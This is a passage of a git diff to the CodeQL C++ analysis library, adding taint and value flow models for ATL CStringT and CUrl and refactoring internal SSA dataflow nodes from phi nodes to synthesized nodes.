["ATL", "CStringT", True, "CStringT", "(char,int)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(wchar_t,int)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(const XCHAR *,int)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(const YCHAR *,int)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(const XCHAR *,int,AtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "CStringT", "(const YCHAR *,int,IAtlStringMgr *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "AllocSysString", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CStringT", True, "AppendFormat", "(PCXSTR,...)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "AppendFormat", "(PCXSTR,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "AppendFormat", "(PCXSTR,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "AppendFormat", "(UINT,...)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "AppendFormat", "(UINT,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "AppendFormat", "(UINT,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "Format", "(PCXSTR,...)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "Format", "(PCXSTR,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "Format", "(PCXSTR,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "Format", "(UINT,...)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "Format", "(UINT,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "Format", "(UINT,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "FormatMessage", "(PCXSTR,...)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "FormatMessage", "(PCXSTR,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "FormatMessage", "(PCXSTR,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "FormatMessage", "(UINT,...)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "FormatMessage", "(UINT,...)", "", "Argument[1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "FormatMessage", "(UINT,...)", "", "Argument[*1..8]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "FormatMessageV", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "FormatMessageV", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "FormatV", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "FormatV", "", "", "Argument[1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "Insert", "(int,PCXSTR)", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "Insert", "(int,XCHAR)", "", "Argument[1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "Left", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CStringT", True, "Right", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CStringT", True, "LoadString", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "LoadString", "", "", "Argument[1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "MakeLower", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CStringT", True, "MakeReverse", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CStringT", True, "MakeUpper", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CStringT", True, "Mid", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CStringT", True, "Replace", "(PCXSTR,PCXSTR)", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "Replace", "(XCHAR,XCHAR)", "", "Argument[1]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CStringT", True, "SetSysString", "", "", "Argument[-1]", "ReturnValue", "value", "manual"] + - ["ATL", "CStringT", True, "SetSysString", "", "", "Argument[-1]", "Argument[**0]", "value", "manual"] + - ["ATL", "CStringT", True, "SpanExcluding", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CStringT", True, "SpanIncluding", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CStringT", True, "Tokenize", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["ATL", "CStringT", True, "Trim", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CStringT", True, "TrimLeft", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CStringT", True, "TrimRight", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CStringT", True, "operator=", "(const CStringT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(const CStringT &)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(const CSimpleStringT &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(const CSimpleStringT &)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(PCXSTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(PCXSTR)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(PCYSTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(PCYSTR)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(const unsigned char *)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(const unsigned char *)", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(XCHAR)", "", "Argument[0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(XCHAR)", "", "Argument[0]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(YCHAR)", "", "Argument[0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(YCHAR)", "", "Argument[0]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(const VARIANT &)", "", "Argument[0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CStringT", True, "operator=", "(const VARIANT &)", "", "Argument[0]", "ReturnValue[*]", "value", "manual"] + - ["ATL", "", True, "operator+", "(const CStringT &,const CStringT &)", "", "Argument[*0..1]", "ReturnValue", "taint", "manual"] + - ["ATL", "", True, "operator+", "(const CStringT &,PCXSTR)", "", "Argument[*0..1]", "ReturnValue", "taint", "manual"] + - ["ATL", "", True, "operator+", "(PCXSTR,const CStringT &)", "", "Argument[*0..1]", "ReturnValue", "taint", "manual"] + - ["ATL", "", True, "operator+", "(char,const CStringT &)", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["ATL", "", True, "operator+", "(char,const CStringT &)", "", "Argument[*1]", "ReturnValue", "taint", "manual"] + - ["ATL", "", True, "operator+", "(const CStringT &,char)", "", "Argument[*0]", "ReturnValue", "taint", "manual"] + - ["ATL", "", True, "operator+", "(const CStringT &,char)", "", "Argument[1]", "ReturnValue", "taint", "manual"] + - ["ATL", "", True, "operator+", "(const CStringT &,wchar_t)", "", "Argument[*0]", "ReturnValue", "taint", "manual"] + - ["ATL", "", True, "operator+", "(const CStringT &,wchar_t)", "", "Argument[1]", "ReturnValue", "taint", "manual"] + - ["ATL", "", True, "operator+", "(wchar_t, const CStringT &)", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["ATL", "", True, "operator+", "(wchar_t,const CStringT &)", "", "Argument[*1]", "ReturnValue", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(const CSimpleStringT &)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(const CStaticString &)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(const CStaticString &)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(const CStaticString &)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(PCXSTR)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(PCXSTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(PCXSTR)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(PCYSTR)", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(PCYSTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(PCYSTR)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(char)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(char)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(unsigned char)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(unsigned char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(unsigned char)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(wchar_t)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(wchar_t)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(const VARIANT &)", "", "Argument[0]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(const VARIANT &)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "", True, "operator+=", "(const VARIANT &)", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/ext/CUrl.model.yml b/cpp/ql/lib/ext/CUrl.model.yml index db51b205d4b5..4f71f64a5a6e 100644 --- a/cpp/ql/lib/ext/CUrl.model.yml +++ b/cpp/ql/lib/ext/CUrl.model.yml @@ -3,20 +3,20 @@ extensions: pack: codeql/cpp-all extensible: summaryModel data: # TODO this model can be improved a lot once we have MapKey content # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - - ["", "CUrl", True, "CUrl", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CUrl", True, "CrackUrl", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CUrl", True, "CreateUrl", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] - - ["", "CUrl", True, "GetExtraInfo", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CUrl", True, "GetHostName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CUrl", True, "GetPassword", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CUrl", True, "GetSchemeName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CUrl", True, "GetUrlPath", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CUrl", True, "GetUserName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] - - ["", "CUrl", True, "SetExtraInfo", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CUrl", True, "SetHostName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CUrl", True, "SetPassword", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CUrl", True, "SetSchemeName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CUrl", True, "SetUrlPath", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CUrl", True, "SetUserName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - - ["", "CUrl", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - - ["", "CUrl", True, "operator=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file + - ["ATL", "CUrl", True, "CUrl", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CUrl", True, "CrackUrl", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CUrl", True, "CreateUrl", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] + - ["ATL", "CUrl", True, "GetExtraInfo", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CUrl", True, "GetHostName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CUrl", True, "GetPassword", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CUrl", True, "GetSchemeName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CUrl", True, "GetUrlPath", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CUrl", True, "GetUserName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["ATL", "CUrl", True, "SetExtraInfo", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CUrl", True, "SetHostName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CUrl", True, "SetPassword", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CUrl", True, "SetSchemeName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CUrl", True, "SetUrlPath", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CUrl", True, "SetUserName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["ATL", "CUrl", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["ATL", "CUrl", True, "operator=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/lib/qlpack.yml b/cpp/ql/lib/qlpack.yml index cf30b0fe296e..2f9e0a91ca63 100644 --- a/cpp/ql/lib/qlpack.yml +++ b/cpp/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/cpp-all -version: 4.0.3 +version: 4.1.0 groups: cpp dbscheme: semmlecode.cpp.dbscheme extractor: cpp diff --git a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowPrivate.qll b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowPrivate.qll index c169567e8b5e..f6371e5b696c 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowPrivate.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowPrivate.qll @@ -1318,7 +1318,7 @@ predicate nodeIsHidden(Node n) { or n instanceof InitialGlobalValue or - n instanceof SsaPhiInputNode + n instanceof SsaSynthNode } predicate neverSkipInPathGraph(Node n) { @@ -1520,16 +1520,17 @@ private EdgeKind caseOrDefaultEdge() { private int countNumberOfBranchesUsingParameter(SwitchInstruction switch, ParameterNode p) { exists(Ssa::SourceVariable sv | parameterNodeHasSourceVariable(p, sv) and - // Count the number of cases that use the parameter. We do this by finding the phi node - // that merges the uses/defs of the parameter. There might be multiple such phi nodes, so - // we pick the one with the highest edge count. + // Count the number of cases that use the parameter. result = - max(SsaPhiNode phi | - switch.getSuccessor(caseOrDefaultEdge()).getBlock().dominanceFrontier() = - phi.getBasicBlock() and - phi.getSourceVariable() = sv - | - strictcount(phi.getAnInput()) + strictcount(IRBlock caseblock | + exists(IRBlock useblock | + switch.getSuccessor(caseOrDefaultEdge()).getBlock() = caseblock and + caseblock.dominates(useblock) + | + exists(Ssa::UseImpl use | use.hasIndexInBlock(useblock, _, sv)) + or + exists(Ssa::DefImpl def | def.hasIndexInBlock(useblock, _, sv)) + ) ) ) } @@ -1631,9 +1632,7 @@ private Instruction getAnInstruction(Node n) { not n instanceof InstructionNode and result = n.asOperand().getUse() or - result = n.(SsaPhiNode).getPhiNode().getBasicBlock().getFirstInstruction() - or - result = n.(SsaPhiInputNode).getBasicBlock().getFirstInstruction() + result = n.(SsaSynthNode).getBasicBlock().getFirstInstruction() or n.(IndirectInstruction).hasInstructionAndIndirectionIndex(result, _) or @@ -1765,14 +1764,14 @@ module IteratorFlow { * Note: Unlike `def.getAnUltimateDefinition()` this predicate also * traverses back through iterator increment and decrement operations. */ - private Ssa::DefinitionExt getAnUltimateDefinition(Ssa::DefinitionExt def) { + private Ssa::Definition getAnUltimateDefinition(Ssa::Definition def) { result = def.getAnUltimateDefinition() or exists(IRBlock bb, int i, IteratorCrementCall crementCall, Ssa::SourceVariable sv | crementCall = def.getValue().asInstruction().(StoreInstruction).getSourceValue() and sv = def.getSourceVariable() and bb.getInstruction(i) = crementCall and - Ssa::ssaDefReachesReadExt(sv, result, bb, i) + Ssa::ssaDefReachesRead(sv, result, bb, i) ) } @@ -1800,13 +1799,13 @@ module IteratorFlow { GetsIteratorCall beginCall, Instruction writeToDeref ) { exists( - StoreInstruction beginStore, IRBlock bbStar, int iStar, Ssa::DefinitionExt def, - IteratorPointerDereferenceCall starCall, Ssa::DefinitionExt ultimate, Operand address + StoreInstruction beginStore, IRBlock bbStar, int iStar, Ssa::Definition def, + IteratorPointerDereferenceCall starCall, Ssa::Definition ultimate, Operand address | isIteratorWrite(writeToDeref, address) and operandForFullyConvertedCall(address, starCall) and bbStar.getInstruction(iStar) = starCall and - Ssa::ssaDefReachesReadExt(_, def, bbStar, iStar) and + Ssa::ssaDefReachesRead(_, def, bbStar, iStar) and ultimate = getAnUltimateDefinition*(def) and beginStore = ultimate.getValue().asInstruction() and operandForFullyConvertedCall(beginStore.getSourceValueOperand(), beginCall) @@ -1835,45 +1834,15 @@ module IteratorFlow { private module IteratorSsa = SsaImpl::Make; - cached - private newtype TSsaDef = - TDef(IteratorSsa::DefinitionExt def) or - TPhi(PhiNode phi) - - abstract private class SsaDef extends TSsaDef { - /** Gets a textual representation of this element. */ - string toString() { none() } - - /** Gets the underlying non-phi definition or use. */ - IteratorSsa::DefinitionExt asDef() { none() } - - /** Gets the underlying phi node. */ - PhiNode asPhi() { none() } - - /** Gets the location of this element. */ - abstract Location getLocation(); - } - - private class Def extends TDef, SsaDef { - IteratorSsa::DefinitionExt def; - - Def() { this = TDef(def) } - - final override IteratorSsa::DefinitionExt asDef() { result = def } - + private class Def extends IteratorSsa::DefinitionExt { final override Location getLocation() { result = this.getImpl().getLocation() } - /** Gets the variable written to by this definition. */ - final SourceVariable getSourceVariable() { result = def.getSourceVariable() } - - override string toString() { result = def.toString() } - /** * Holds if this definition (or use) has index `index` in block `block`, * and is a definition (or use) of the variable `sv`. */ predicate hasIndexInBlock(IRBlock block, int index, SourceVariable sv) { - def.definesAt(sv, block, index, _) + super.definesAt(sv, block, index, _) } private Ssa::DefImpl getImpl() { @@ -1890,20 +1859,6 @@ module IteratorFlow { int getIndirectionIndex() { result = this.getImpl().getIndirectionIndex() } } - private class Phi extends TPhi, SsaDef { - PhiNode phi; - - Phi() { this = TPhi(phi) } - - final override PhiNode asPhi() { result = phi } - - final override Location getLocation() { result = phi.getBasicBlock().getLocation() } - - override string toString() { result = phi.toString() } - - SsaIteratorNode getNode() { result.getIteratorFlowNode() = phi } - } - private class PhiNode extends IteratorSsa::DefinitionExt { PhiNode() { this instanceof IteratorSsa::PhiNode or diff --git a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll index c9e2a7136216..3b6e190cc981 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll @@ -27,7 +27,7 @@ import ExprNodes * - `VariableNode`, which is used to model flow through global variables. * - `PostUpdateNodeImpl`, which is used to model the state of an object after * an update after a number of loads. - * - `SsaPhiNode`, which represents phi nodes as computed by the shared SSA + * - `SsaSynthNode`, which represents synthesized nodes as computed by the shared SSA * library. * - `RawIndirectOperand`, which represents the value of `operand` after * loading the address a number of times. @@ -47,8 +47,7 @@ private newtype TIRDataFlowNode = or Ssa::isModifiableByCall(operand, indirectionIndex) } or - TSsaPhiInputNode(Ssa::PhiNode phi, IRBlock input) { phi.hasInputFromBlock(_, _, _, _, input) } or - TSsaPhiNode(Ssa::PhiNode phi) or + TSsaSynthNode(Ssa::SynthNode n) or TSsaIteratorNode(IteratorFlow::IteratorFlowNode n) or TRawIndirectOperand0(Node0Impl node, int indirectionIndex) { Ssa::hasRawIndirectOperand(node.asOperand(), indirectionIndex) @@ -184,10 +183,11 @@ class Node extends TIRDataFlowNode { or this.asOperand().getUse() = block.getInstruction(i) or - this.(SsaPhiNode).getPhiNode().getBasicBlock() = block and i = -1 - or - this.(SsaPhiInputNode).getBlock() = block and - i = block.getInstructionCount() + exists(Ssa::SynthNode ssaNode | + this.(SsaSynthNode).getSynthNode() = ssaNode and + ssaNode.getBasicBlock() = block and + ssaNode.getIndex() = i + ) or this.(RawIndirectOperand).getOperand().getUse() = block.getInstruction(i) or @@ -313,13 +313,79 @@ class Node extends TIRDataFlowNode { * `n.asExpr() instanceof IncrementOperation` since the result of evaluating * the expression `x++` is passed to `sink`. */ - Expr asDefinition() { - exists(StoreInstruction store | + Expr asDefinition() { result = this.asDefinition(_) } + + /** + * Gets the definition associated with this node, if any. + * + * For example, consider the following example + * ```cpp + * int x = 42; // 1 + * x = 34; // 2 + * ++x; // 3 + * x++; // 4 + * x += 1; // 5 + * int y = x += 2; // 6 + * ``` + * - For (1) the result is `42`. + * - For (2) the result is `x = 34`. + * - For (3) the result is `++x`. + * - For (4) the result is `x++`. + * - For (5) the result is `x += 1`. + * - For (6) there are two results: + * - For the definition generated by `x += 2` the result is `x += 2` + * - For the definition generated by `int y = ...` the result is + * also `x += 2`. + * + * For assignments, `node.asDefinition(_)` and `node.asExpr()` will both exist + * for the same dataflow node. However, for expression such as `x++` that + * both write to `x` and read the current value of `x`, `node.asDefinition(_)` + * will give the node corresponding to the value after the increment, and + * `node.asExpr()` will give the node corresponding to the value before the + * increment. For an example of this, consider the following: + * + * ```cpp + * sink(x++); + * ``` + * in the above program, there will not be flow from a node `n` such that + * `n.asDefinition(_) instanceof IncrementOperation` to the argument of `sink` + * since the value passed to `sink` is the value before to the increment. + * However, there will be dataflow from a node `n` such that + * `n.asExpr() instanceof IncrementOperation` since the result of evaluating + * the expression `x++` is passed to `sink`. + * + * If `uncertain = false` then the definition is guaranteed to overwrite + * the entire buffer pointed to by the destination address of the definition. + * Otherwise, `uncertain = true`. + * + * For example, the write `int x; x = 42;` is guaranteed to overwrite all the + * bytes allocated to `x`, while the assignment `int p[10]; p[3] = 42;` has + * `uncertain = true` since the write will not overwrite the entire buffer + * pointed to by `p`. + */ + Expr asDefinition(boolean uncertain) { + exists(StoreInstruction store, Ssa::Definition def | store = this.asInstruction() and - result = asDefinitionImpl(store) + result = asDefinitionImpl(store) and + Ssa::defToNode(this, def, _) and + if def.isCertain() then uncertain = false else uncertain = true ) } + /** + * Gets the definition associated with this node, if this node is a certain definition. + * + * See `Node.asDefinition/1` for a description of certain and uncertain definitions. + */ + Expr asCertainDefinition() { result = this.asDefinition(false) } + + /** + * Gets the definition associated with this node, if this node is an uncertain definition. + * + * See `Node.asDefinition/1` for a description of certain and uncertain definitions. + */ + Expr asUncertainDefinition() { result = this.asDefinition(true) } + /** * Gets the indirect definition at a given indirection corresponding to this * node, if any. @@ -620,117 +686,30 @@ class PostFieldUpdateNode extends PostUpdateNodeImpl { /** * INTERNAL: do not use. * - * A phi node produced by the shared SSA library, viewed as a node in a data flow graph. + * A synthesized SSA node produced by the shared SSA library, viewed as a node + * in a data flow graph. */ -class SsaPhiNode extends Node, TSsaPhiNode { - Ssa::PhiNode phi; +class SsaSynthNode extends Node, TSsaSynthNode { + Ssa::SynthNode node; - SsaPhiNode() { this = TSsaPhiNode(phi) } + SsaSynthNode() { this = TSsaSynthNode(node) } - /** Gets the phi node associated with this node. */ - Ssa::PhiNode getPhiNode() { result = phi } + /** Gets the synthesized SSA node associated with this node. */ + Ssa::SynthNode getSynthNode() { result = node } override DataFlowCallable getEnclosingCallable() { result.asSourceCallable() = this.getFunction() } - override Declaration getFunction() { result = phi.getBasicBlock().getEnclosingFunction() } + override Declaration getFunction() { result = node.getBasicBlock().getEnclosingFunction() } - override DataFlowType getType() { - exists(Ssa::SourceVariable sv | - this.getPhiNode().definesAt(sv, _, _, _) and - result = sv.getType() - ) - } - - override predicate isGLValue() { phi.getSourceVariable().isGLValue() } + override DataFlowType getType() { result = node.getSourceVariable().getType() } - final override Location getLocationImpl() { result = phi.getBasicBlock().getLocation() } + override predicate isGLValue() { node.getSourceVariable().isGLValue() } - override string toStringImpl() { result = phi.toString() } - - /** - * Gets a node that is used as input to this phi node. - * `fromBackEdge` is true if data flows along a back-edge, - * and `false` otherwise. - */ - cached - final Node getAnInput(boolean fromBackEdge) { - result.(SsaPhiInputNode).getPhiNode() = phi and - exists(IRBlock bPhi, IRBlock bResult | - bPhi = phi.getBasicBlock() and bResult = result.getBasicBlock() - | - if bPhi.dominates(bResult) then fromBackEdge = true else fromBackEdge = false - ) - } - - /** Gets a node that is used as input to this phi node. */ - final Node getAnInput() { result = this.getAnInput(_) } - - /** Gets the source variable underlying this phi node. */ - Ssa::SourceVariable getSourceVariable() { result = phi.getSourceVariable() } - - /** - * Holds if this phi node is a phi-read node. - * - * Phi-read nodes are like normal phi nodes, but they are inserted based - * on reads instead of writes. - */ - predicate isPhiRead() { phi.isPhiRead() } -} - -/** - * INTERNAL: Do not use. - * - * A node that is used as an input to a phi node. - * - * This class exists to allow more powerful barrier guards. Consider this - * example: - * - * ```cpp - * int x = source(); - * if(!safe(x)) { - * x = clear(); - * } - * // phi node for x here - * sink(x); - * ``` - * - * At the phi node for `x` it is neither the case that `x` is dominated by - * `safe(x)`, or is the case that the phi is dominated by a clearing of `x`. - * - * By inserting a "phi input" node as the last entry in the basic block that - * defines the inputs to the phi we can conclude that each of those inputs are - * safe to pass to `sink`. - */ -class SsaPhiInputNode extends Node, TSsaPhiInputNode { - Ssa::PhiNode phi; - IRBlock block; - - SsaPhiInputNode() { this = TSsaPhiInputNode(phi, block) } - - /** Gets the phi node associated with this node. */ - Ssa::PhiNode getPhiNode() { result = phi } - - /** Gets the basic block in which this input originates. */ - IRBlock getBlock() { result = block } - - override DataFlowCallable getEnclosingCallable() { - result.asSourceCallable() = this.getFunction() - } - - override Declaration getFunction() { result = phi.getBasicBlock().getEnclosingFunction() } - - override DataFlowType getType() { result = this.getSourceVariable().getType() } - - override predicate isGLValue() { phi.getSourceVariable().isGLValue() } - - final override Location getLocationImpl() { result = block.getLastInstruction().getLocation() } - - override string toStringImpl() { result = "Phi input" } + final override Location getLocationImpl() { result = node.getLocation() } - /** Gets the source variable underlying this phi node. */ - Ssa::SourceVariable getSourceVariable() { result = phi.getSourceVariable() } + override string toStringImpl() { result = node.toString() } } /** @@ -1305,10 +1284,10 @@ class UninitializedNode extends Node { LocalVariable v; UninitializedNode() { - exists(Ssa::DefinitionExt def, Ssa::SourceVariable sv | + exists(Ssa::Definition def, Ssa::SourceVariable sv | def.getIndirectionIndex() = 0 and def.getValue().asInstruction() instanceof UninitializedInstruction and - Ssa::defToNode(this, def, sv, _, _, _) and + Ssa::defToNode(this, def, sv) and v = sv.getBaseVariable().(Ssa::BaseIRVariable).getIRVariable().getAst() ) } @@ -1733,6 +1712,21 @@ predicate hasInstructionAndIndex( cached private module Cached { + /** + * Holds if `n` has a local flow step that goes through a back-edge. + */ + cached + predicate flowsToBackEdge(Node n) { + exists(Node succ, IRBlock 